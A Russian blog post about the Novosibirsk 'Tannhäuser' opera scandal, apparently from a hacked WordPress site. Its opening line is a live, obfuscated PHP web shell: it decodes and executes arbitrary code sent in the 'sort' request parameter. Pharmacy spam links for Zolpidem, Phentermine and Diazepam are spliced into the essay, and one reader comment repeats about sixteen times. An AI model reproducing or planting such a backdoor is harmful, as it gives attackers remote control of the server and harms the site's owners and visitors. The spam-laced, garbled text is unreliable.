nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

О женских прокладках (Тангейзер)


http://ectarc.com/about-us/ ИЗНАЧАЛЬНО  ЭТА  ЗАМЕТКА  ПРЕДНАЗНАЧАЛАСЬ  ДЛЯ  НАШЕГО  С  оГЕОРГИЕМ   СЫНА,  КОТОРЫЙ  ПРОФЕССИОНАЛЬНО  ЗАНИМАЕТСЯ ВОКАЛОМ  И         собирается  стать  “великим  оперным”,  НО   абсолютно  не   интересуется   политикой . . .
                                                     
( С Ы Н У  : )      
К  твоему  сведению: постер “Тангейзера”  постыден,   как  и  сам   “тот  ещё”   “видеоряд” :  распятие  с  Христом   изображено … между   ног   блудницы ! )
                                             
                                            Т А М      Г Е Й З Е Р       Р А З Д О Р О В
Если  посмотреть  на  сложившуюся  вокруг  новосибирского  театра  ситуацию,  “как  души смотрят  с  высоты…”,  то  можно констатировать,  что          произошло   настоящее    В Е Л И К О П О С Т Н О Е    ИСКУШЕНИЕ,   искушение   “на   всю   голову”   –  на всю  Россию !

Zolpidem 5Mg Buy Online Масштаб    этого   и с к у ш е н и я    говорит     т о л ь к о   о    том,  что  внутри  нас  идут  мощные  метафизические процессы. Скоро  люди   в е р у ю щ и е       ( … очень  хочется   поставить     з а п я т у ю    после  слова  “люди”,  дабы  усилить глагольность,  а  не  прилагательность,  слова  “верующие”…) . своим  громогласным  ХРИСТОС    ВОСКРЕСЕ !   дадут   правильный   вектор разрешению   этого  метафизического  конфликта – не сомневаюсь…

Buy Phentermine Using Paypal Но,  простите,   немного  покликушествую.

В  начале  семидесятых,  работая  в  Кировском  (Мариинском)  театре,  мне  пришлось  быть  свидетелем,  казалось  бы,  безобидной постановки  балета  “Сотворение  мира”   и  постепенной   “кармической”   раскрутки   судеб  её  сотворителей  – вплоть  до  самоубийства исполнителя  партии  “Бога”.  Это  было  ужасно.  Но  это  было  как  бы  ненароком,  не  сразу (помните  12  негритят  Агаты  Кристи ?) И  понятно  было,  что  это –  воздаяние:  “cила  Божия  втуне  совершается…”   И  неверующие,  и  верующие  хвост-то   поджали … (правда,  ненадолго)…

Diazepam Kopen Rotterdam В нынешнем   великопостном   искушении  Иисус  Христос  снова   вроде  бы  –  “крайний”,  придуманный  персонаж,  сюжетная  прокладка …
Но   п о с л е д н е е    слово  будет,  как  всегда,   всё  же  за  Ним !
Мы   В С Е   в   этот   Великий пост  ловко   Им   протестированы,    и    Его р е з ю м е   о нас будет явно и/или тайно,  но   –   точно  будет !

http://letterforma.com/redken-eq-shades/redken-eq-shades-a446eed2f5eb2452900f82909686cd14-jpg/ Как   сказал   другой  всеми   любимый   персонаж  –  Штирлиц   другому,  тоже  всеми  любимому  персонажу – Мюллеру: ” Я  игрок,  а  не болван  в  старом  польском  преферансе !”

http://code-pages.com/robots.txt Да,  Христос – “игрок”,  а  не  женская  прокладка,  прости,  Господи !


  1. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Buy Zopiclone Next Day Delivery Uk Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    http://12twenty.com/index/ Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    Buy 15 Mg Phentermine Uk Online В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  2. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  3. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  4. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  5. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  6. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  7. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  8. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  9. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  10. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  11. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  12. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  13. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  14. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  15. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

    Но вышло так, что собственный прилизанный образ они поставили на Его место — не столько служили Ему, сколько распределяли благодать среди населения. Вот с этим и не мог согласиться Иисус. Он еще учеников предупреждал насчет фарисейской закваски и того, что хорошего отношения со стороны окружающих не стоит не то чтобы добиваться, но даже ждать.

    Ежегодное прочтение одних и тех же текстов, повторение ритуалов и воспроизводство символов в самом правильном и каноничном виде еще не означает, что ты займешь то самое место среди этих символов, которое зарезервировал за собой. И самое нелепое, что можно тут сделать, — добиваться такого места полицейскими способами.”

    ———————————–
    диакон Андрей Кураев:”Вчера (до митинга) позавтракал с уволенным директором Оперного театра Б.М. Мездричем. Наши понимания сюжета Тангейзера вполне совпали: это история болезни. Врач, который рассказывает о бреде своего пациента, сам не должен помещаться в психушку.

    Интересен был его рассказа о временах, когда министр культуры Авдеев вызвал его из Новосибирска и предложил возглавить древнейший театр России – “волковский” театр в Ярославле. Он восхищен Толгским монастырем и его игуменьей. Считает знаком, что его день рождения совпал с днем празднования именно Толгской иконы Богородицы.

    В общем – ничего антихристианского и не заметил.

    Рассказал, что трижды просил посредников договориться о встрече с митрополитом (причем передававшие эту просьбу посредники были людьми весьма статусными: министр культуры области, федеральный инспектор по Новосибирску, даже губернатор). В ответ – полное нежелание диалога.

    И еще деталь: несколько певцом из театра подрабатывают певцами в церковных хорах города (в том числе и у о. Александра Новопашина). И они, участвуя в репетициях и в спектакле, отчего-то не “оскорбились”. Может, оттого, что они лучше владыки разобрались в театральной специфике?

  16. Полагаю, в этих православных наездах на “Тангейзер” антихристианства больше, чем в самом “Тангейзере”.
    —————————-
    Андрей Десницкий:”Главная проблема книжников и фарисеев заключалась в том, что они очень хотели выглядеть хорошо.

    Им казалось, что в их лице народ прославляет и почитает Бога.

